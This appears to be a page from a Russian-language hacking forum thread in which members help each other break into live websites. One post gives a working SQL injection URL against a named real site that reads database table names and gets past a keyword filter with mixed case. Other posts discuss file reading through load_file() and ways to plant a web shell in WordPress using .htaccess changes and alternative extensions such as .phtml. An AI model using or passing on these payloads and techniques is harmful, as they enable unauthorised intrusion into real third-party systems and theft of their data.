HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1111  
Старый 07.02.2016, 14:16
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от Улыбайся  
Улыбайся said:

тогда когда какой вариант? создать пользователя который сможет? CREATE USER
Как вариант попробывать вот эту тему:

https://rdot.org/forum/showthread.php?t=741

но это только лишь читалка...

P.S: Читалку тестировали? load_file()
 
Ответить с цитированием

  #1112  
Старый 07.02.2016, 14:18
ArmusIAm
Guest
Сообщений: n/a
Провел на форуме:
7147

Репутация: 0
По умолчанию

http://www.enec.ru/Index.phtml?Name=...ct+1,2,3,4,5--

Хостер фильтрует "from", чем можно заменить или обойти фильтр?
 
Ответить с цитированием

  #1113  
Старый 07.02.2016, 18:29
private_static
Guest
Сообщений: n/a
Провел на форуме:
25535

Репутация: 22
По умолчанию

Цитата:
Сообщение от ArmusIAm  
ArmusIAm said:

http://www.enec.ru/Index.phtml?Name=...ct+1,2,3,4,5--
Хостер фильтрует "from", чем можно заменить или обойти фильтр?
Код:
Code:
http://www.enec.ru/Index.phtml?Name=News&newsID=-40+union+select+1,2,TABLE_NAME,4,5+fRoM+information_schema.tables
 
Ответить с цитированием

  #1114  
Старый 07.02.2016, 18:49
Улыбайся
Guest
Сообщений: n/a
Провел на форуме:
18621

Репутация: 3
По умолчанию

Цитата:
Сообщение от winstrool  
winstrool said:

Как вариант попробывать вот эту тему:
https://rdot.org/forum/showthread.php?t=741
но это только лишь читалка...
P.S: Читалку тестировали?
load_file()
ок гляну.
 
Ответить с цитированием

  #1115  
Старый 07.02.2016, 21:51
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

какие варианы залития шелла в вордпресс при штаке на папку /uploads ? все читается как текстовые файлы
 
Ответить с цитированием

  #1116  
Старый 08.02.2016, 01:51
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от Br@!ns  
Br@!ns said:

какие варианы залития шелла в вордпресс при штаке на папку /uploads ? все читается как текстовые файлы
темплейты, плагины..
 
Ответить с цитированием

  #1117  
Старый 08.02.2016, 12:37
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:

темплейты, плагины..
-

само собой там тоже без прав)
 
Ответить с цитированием

  #1118  
Старый 08.02.2016, 12:38
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию

Цитата:
Сообщение от Br@!ns  
Br@!ns said:

-
само собой там тоже без прав)
Правка .htaccess ?

Установка нового .htaccess в твою папку со своими привилегиями
 
Ответить с цитированием

  #1119  
Старый 08.02.2016, 12:43
Saint-Sky
Участник форума
Регистрация: 14.07.2007
Сообщений: 108
Провел на форуме:
1888785

Репутация: 305
По умолчанию

Цитата:
Сообщение от Br@!ns  
Br@!ns said:

какие варианы залития шелла в вордпресс при штаке на папку /uploads ? все читается как текстовые файлы
Все расширения пробовал?

А то я встречал такие .хтаксес, что все виды .php - читались как текст, а вот .phtml прокатывал...
 
Ответить с цитированием

  #1120  
Старый 08.02.2016, 13:07
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

Цитата:
Сообщение от OxoTnik  
OxoTnik said:

Правка .htaccess ?
Установка нового .htaccess в твою папку со своими привилегиями
штака сохраняется как /htaccess, т.е без точки, т.е не работает (гружу через добавление темы)

с расширениями тоже чего то не хочет. shtml шелл так же ничего не показывает
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ